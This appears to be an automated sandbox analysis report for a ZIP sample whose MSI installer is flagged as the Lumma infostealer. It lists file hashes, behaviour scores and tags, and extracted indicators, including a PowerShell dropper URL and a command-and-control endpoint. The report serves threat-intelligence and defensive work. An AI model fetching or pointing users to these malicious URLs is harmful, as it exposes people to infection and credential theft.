Overview

overview

10

Static

static

3

Sgrm/samcli.dll

windows10-2004-x64

1

Sgrm/samlib.dll

windows10-2004-x64

4

Sgrm/sas.dll

windows10-2004-x64

1

app__v7.3.5_.msi

windows7-x64

6

app__v7.3.5_.msi

windows10-2004-x64

10

wbem/appba...sk.dll

windows10-2004-x64

1

wbem/dnsclientcim.dll

windows10-2004-x64

1

wbem/dnscl...er.dll

windows10-2004-x64

1

winrm/AcLayers.dll

windows10-2004-x64

1

winrm/acledit.dll

windows10-2004-x64

1

winrm/aclui.dll

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5b790d2d085d2498aa63822812562acc256a26febae6cc78563ba656eb9d0c1f.zip

  • Size

    51.1MB

  • Sample

    241002-bnst8atdra

  • MD5

    c421f2ae1826f36d1224070127bb50ef

  • SHA1

    347fd2d1cfc0000c9b7f8525852cecd438692523

  • SHA256

    5b790d2d085d2498aa63822812562acc256a26febae6cc78563ba656eb9d0c1f

  • SHA512

    d5761f517467c36540d9998b20c2dbf9a745de602fa558ea5ae2b9080248374f72372ff73d204836dfb75fea6362ae688c77ac4704e4825e3d743949bb012421

  • SSDEEP

    1572864:amp+AkxOx6mkMspNbawUPlE6bvgqqkzST1T5g9JWicwZKFct:ao+M6mk5pshPlE6bIqnzE15g9otAKFct

Score
10/10
lummadiscoveryexecutionpersistenceprivilege_escalationstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://last-blink.com/2709.bs64

Extracted

Family

lumma

C2

https://gravvitywio.store/api

Targets

    • Target

      Sgrm/samcli.dll

    • Size

      81KB

    • MD5

      88fc8a7c285558b7f502f1a4c7f66314

    • SHA1

      6ccceff830bf6683a4c20e64654fd05a12f40406

    • SHA256

      09a086e2575c72f0835b7df861f219ad58b80f3a6318d44be29f4fde36a57f3c

    • SHA512

      89bb84e876368d457d63471072ebd45c2801a329e83ca400a9eee9864449cd4a3bc8c779b184929ff797074bf160258f6388779549c42d54d001fe21c550d947

    • SSDEEP

      1536:/pGdBAtLXW/2hUqNYgUYYYTzwc/g3+asq1itSbdsd:/pTiOpYKYYTzz/g3+Ztya

    Score
    1/10
    behavioral1

    • Target

      Sgrm/samlib.dll

    • Size

      136KB

    • MD5

      f7f0b9e790bcd33c30480c71eb4fa1e8

    • SHA1

      69cf3f2b3a42a04661ed97afc840718acea7ddf1

    • SHA256

      70515c36ffa220475e2d1816611320ffabf1102f1db11d3333780dcad2bb5f69

    • SHA512

      11932fb84f4812ce9e8205c60d121a628feeb00f445a446a73cb90f85b39b88350548a0eb24a8131c03b51aac663b0a9998e111aedcda788e9087b444677814d

    • SSDEEP

      3072:8w7ztRF/xFptOaYcfBvknaGrGzLona9LdYl7AS4:8WtRF/xFpIfc5vkhrGzLonflES

    Score
    4/10
    behavioral2

    • Target

      Sgrm/sas.dll

    • Size

      14KB

    • MD5

      5f46fec4bca81562f8702650705b86d3

    • SHA1

      c974e9c0f66ee41eedd15d902a9113d97291bf56

    • SHA256

      7d78f5e2102c8e12b591e8c38c95f400a4b3cc3ce911f26b9453d5aaf7f8532d

    • SHA512

      8adec668d362f2b3bcc4a0587849c5e279e154b5dce20b52ec89ae2399fbfb3335235dcb173f3a93a9d501a9a58b1f5b2178f5a53cb5400d75c82f5aff95861a

    • SSDEEP

      384:czK80Jwm4e1F4HR6661hS666r63VnH/YkyvgbbWMwW:cm8D73YMbr

    Score
    1/10
    behavioral3

    • Target

      app__v7.3.5_.msi

    • Size

      54.5MB

    • MD5

      2d6151dbbbb50c077564ef7ffc971a4e

    • SHA1

      b67ec6dd683f5f8b12d52aa79aeee9a498380589

    • SHA256

      2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd

    • SHA512

      22a30787cf820da489ed59b8f6401b1282b923a66f796211c2300f1864f4f10bee01d24133bfcb35975695f32273796cacdef03d726345c7a12cfb8ce6509979

    • SSDEEP

      1572864:0p+Ty2SfWnHDk8FjVbfzPTq4h+RZYoFczfDiQPU8azMCAJ:h/0WnHDkkjBPTq4kYoFefTPU8awCm

    Score
    10/10
    discoverypersistenceprivilege_escalationlummaexecutionstealer

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

      stealerlumma

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Suspicious use of SetThreadContext

    behavioral4behavioral5

    • Target

      wbem/appbackgroundtask.dll

    • Size

      39KB

    • MD5

      f29672bfb0fbe6ab0e243b8f747c2a2b

    • SHA1

      d6aa9d19add28c56e51c9f68f3357d7f5bd73855

    • SHA256

      5c8fabc6deb9e31de141babba94bace2446e89ce7b1888c6d0feca49ccadc67f

    • SHA512

      37323b3f29b0511ddf2671f56f27c77c34ca6b3eabdca02ae6199ad4ce17c5db6898534d5e9120423dc4a79733f4173de0217f3dbf0d9effba8e0426201a6dba

    • SSDEEP

      768:DJgqRCBUTGAf8btSazYgg71sUE49nsX6cIIUs5QLnzN4Gi:arKvf8bEtD171dsEIF5QLJ4Gi

    Score
    1/10
    behavioral6

    • Target

      wbem/dnsclientcim.dll

    • Size

      123KB

    • MD5

      b19e94b944bb06be96f9efc3abc0e6a4

    • SHA1

      4632a0b93f4fc3ced4a78f5719352febe2c26615

    • SHA256

      ee05a7de454b561b51d063913e084252f5f8f02868392eb93b5d0f01a364fe1e

    • SHA512

      7925a57c5ba1cf8883d3b9da30e1afd305b214029a98b7de0030b52a4cac46cb78141b8f79bb53995fadbc2f75a7366004e14525c4aedd6808394b42b166ae66

    • SSDEEP

      1536:FE2lWm+50IkaXuBKRLQ6VN7hPJxMbS9j1guZ3Km4HojqR:yujiuMhQ6VN7hPJxMbCj2uRKm4I

    Score
    1/10
    behavioral7

    • Target

      wbem/dnsclientpsprovider.dll

    • Size

      187KB

    • MD5

      28b1abfb1ec9590e38bbdb750c2bc719

    • SHA1

      2ee1a1c8ae201c8a13ae719492d5c8bf2f33b929

    • SHA256

      cfd969c82c408d1cdbc0084736fd888d78c4a0e1dd5bb5873da9fe8bf0c35211

    • SHA512

      027b4fab4dc79622bb316f41c8b36d496649f6d67e50ae19d69ac09af2882e31219eec7c013223372bb1883ffa9831f2684404dcca19391e70319e11c5e6ec0d

    • SSDEEP

      3072:t8sFW4j9LlwNa/aoBEB6tCnrGNidonQMAQy8mVy+Uhw72:t8s3mafBOGNzLAQHmVyFhw

    Score
    1/10
    behavioral8

    • Target

      winrm/AcLayers.dll

    • Size

      325KB

    • MD5

      3a515be88a59d8e0abaa0c299a5019b1

    • SHA1

      0af8f3d0d3a34032b285433728ab4017e5c4a2c6

    • SHA256

      5620f93cbde964ed16b7f3fadc74751e1867447a625da8593424ee3c2e0e7b8e

    • SHA512

      71fdf1ee7e4e3f3d498e19ebce5ff2c9e0ed6891bf39295821e376cf928b4abfaf292e8fe6299fecd5f04716186a5a7d29218096f6e2b3964c2b1aa4dd08ff82

    • SSDEEP

      6144:9BHWoCb3lqocQ5VcmFv6IjG6PQOymwXxzoi35K5w1FwvF:9BHWoI3lNcQ5VccVGK5+wN

    Score
    1/10
    behavioral9

    • Target

      winrm/acledit.dll

    • Size

      11KB

    • MD5

      7c2b65e0756e0dc59e0be5d9efd25da0

    • SHA1

      f6303b5239dd8bd5153e7f7c3593cad714462373

    • SHA256

      b89c8b36a4af02d835dc07b7a905e1a3f95308aac92f614810dd69eb71d9fffb

    • SHA512

      3c76acd4f5963bd3ad7a14449dab8bd16e4bb6f8df01070d3907398be65be56935c8cf204fc1d47c12ce1eb5eacebc098845c6d4543189455c75f18d638f0cfa

    • SSDEEP

      96:lYEn2RqMoqNGINrOp2Q96GOGZgmPlx2sVN2est7hnlCdCEW1YTWw9:iE2Qt8/9hGOG7L2WUNhnlgPW2TW

    Score
    1/10
    behavioral10

    • Target

      winrm/aclui.dll

    • Size

      574KB

    • MD5

      9e12cf3363f8dfc2b2624c4171183eab

    • SHA1

      fcf3c863523ac59dd9e1a030440a731a44b09194

    • SHA256

      e39cdcfd6859ccb705879cf9088522b43941db6ef5683d5719bdaa93340c35a4

    • SHA512

      2492baf066772d26004da646e2574210ddc279675d22f0836833b5953f6c4b2c1481377d7c1d67e205b27aba2381de606985ebb5b4c7360c13443d56110a3aa1

    • SSDEEP

      12288:hytiG4FyHoIoVFLZ0Lr+LhL1Kf0dUQK9zxSW3djeRG:0QG4w+FLmn+L3dTK9zxSW3djeR

    Score
    1/10
    behavioral11

MITRE ATT&CK Enterprise v15

Tasks